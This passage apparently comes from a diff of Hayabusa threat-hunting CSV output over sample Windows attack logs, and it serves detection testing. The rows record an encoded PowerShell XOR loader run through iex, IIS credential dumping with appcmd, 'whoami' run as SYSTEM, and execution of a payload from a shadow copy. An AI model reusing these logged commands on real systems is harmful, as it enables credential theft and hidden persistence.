bwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2108 | PGUID: 365ABB72-3D70-5CEB-0000-0010B2E2FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:20.305 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2640 | PGUID: 365ABB72-3D70-5CEB-0000-001072E6FF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:20.435 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir "". )"" /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 1004 | PGUID: 365ABB72-3D70-5CEB-0000-001032EAFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:20.555 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir "". )"" /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 4012 | PGUID: 365ABB72-3D70-5CEB-0000-0010F2EDFF00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-28 00:12:38.241 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c whoami /groups | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 3256 | PGUID: 365ABB72-FE66-5CEB-0000-001058F50B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:38.290 +09:00,IEWIN7,1,info,,Process Created,Cmd: whoami /groups | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c whoami /groups | LID: 0x3e7 | PID: 1168 | PGUID: 365ABB72-FE66-5CEB-0000-0010C7F80B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:38.290 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:38.290 +09:00,IEWIN7,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,../hayabusa-rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:38.290 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:43.990 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 1536 | PGUID: 365ABB72-FE6B-5CEB-0000-00102A090C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:44.055 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state | Process: C:\Windows\System32\wbem\WMIC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state | LID: 0x3e7 | PID: 3520 | PGUID: 365ABB72-FE6C-5CEB-0000-0010050C0C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:44.055 +09:00,IEWIN7,1,medium,Exec,WMI Reconnaissance List Remote Services,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmic_remote_service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:45.405 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 3876 | PGUID: 365ABB72-FE6D-5CEB-0000-0010332A0C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:45.491 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state | Process: C:\Windows\System32\wbem\WMIC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state | LID: 0x3e7 | PID: 1636 | PGUID: 365ABB72-FE6D-5CEB-0000-0010122D0C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:45.491 +09:00,IEWIN7,1,medium,Exec,WMI Reconnaissance List Remote Services,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmic_remote_service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:46.981 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\Temp\svhost64.exe | Process: C:\Windows\System32\notepad.exe | PID: 1944 | PGUID: 365ABB72-FD85-5CEB-0000-00104C0E0B00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:47.402 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 3448 | PGUID: 365ABB72-FE6F-5CEB-0000-0010F4370C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:47.478 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\"" | LID: 0x3e7 | PID: 3344 | PGUID: 365ABB72-FE6F-5CEB-0000-0010D33A0C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:47.478 +09:00,IEWIN7,1,medium,CredAccess,Shadow Copies Creation Using Operating Systems Utilities,,../hayabusa-rules/sigma/process_creation/proc_creation_win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:48.655 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 2412 | PGUID: 365ABB72-FE70-5CEB-0000-0010385C0C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:48.763 +09:00,IEWIN7,1,info,,Process Created,"Cmd: vssadmin List Shadows | Process: C:\Windows\System32\vssadmin.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" | LID: 0x3e7 | PID: 1820 | PGUID: 365ABB72-FE70-5CEB-0000-0010935F0C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:48.827 +09:00,IEWIN7,1,info,,Process Created,"Cmd: find ""Shadow Copy Volume"" | Process: C:\Windows\System32\find.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" | LID: 0x3e7 | PID: 1796 | PGUID: 365ABB72-FE70-5CEB-0000-0010D65F0C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:54.447 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 2356 | PGUID: 365ABB72-FE76-5CEB-0000-0010546E0C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:54.544 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe | Process: C:\Windows\System32\wbem\WMIC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe | LID: 0x3e7 | PID: 2840 | PGUID: 365ABB72-FE76-5CEB-0000-001077710C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:54.544 +09:00,IEWIN7,1,medium,CredAccess,Shadow Copies Creation Using Operating Systems Utilities,,../hayabusa-rules/sigma/process_creation/proc_creation_win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
+2019-05-28 00:12:54.544 +09:00,IEWIN7,1,medium,Exec,Suspicious WMI Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_wmi_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
